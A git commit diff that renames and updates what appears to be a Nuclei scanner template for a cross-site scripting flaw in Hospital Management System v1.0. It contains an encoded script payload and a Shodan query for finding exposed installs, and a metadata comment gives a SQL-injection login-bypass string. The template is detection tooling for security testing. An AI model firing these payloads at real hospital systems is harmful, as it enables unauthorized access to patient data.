Update and rename hms-xss-2.yaml to hospital-management-xss2.yaml

2022-09-15 14:02:02 +05:30 · 2022-09-15 14:02:02 +05:30 · 8c672ef591
parent 99e5365479
commit 8c672ef591
1 changed files with 12 additions and 17 deletions
--- a/vulnerabilities/other/hospital-management-xss2.yaml
+++ b/vulnerabilities/other/hospital-management-xss2.yaml
@ -1,4 +1,4 @@
-id: hms-xss-2
+id: hospital-management-xss2

 info:
  name: Hospital Management System v1.0 - Cross Site Scripting
@ -7,10 +7,10 @@ info:
  description: |
    Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
  metadata:
-    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
-    shodan-query: http.html:"Hospital Management System"
    verified: true
-  tags: hms,hospital,cms,xss
+    shodan-query: http.html:"Hospital Management System"
+    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+  tags: hms,hospital,cms,xss,authenticated

 requests:
  - raw:
@ -26,19 +26,14 @@ requests:
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

-        searchdata=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search=
+        searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=

-    skip-variables-check: true
-    redirects: true
-    max-redirects: 2
+    req-condition: true
    cookie-reuse: true
-    matchers-condition: and
    matchers:
-      - type: word
-        part: body
-        words:
-          - '<script>alert("XSS")</script>'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_2, "text/html")'
+          - "status_code_2 == 200"
+          - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
+        condition: and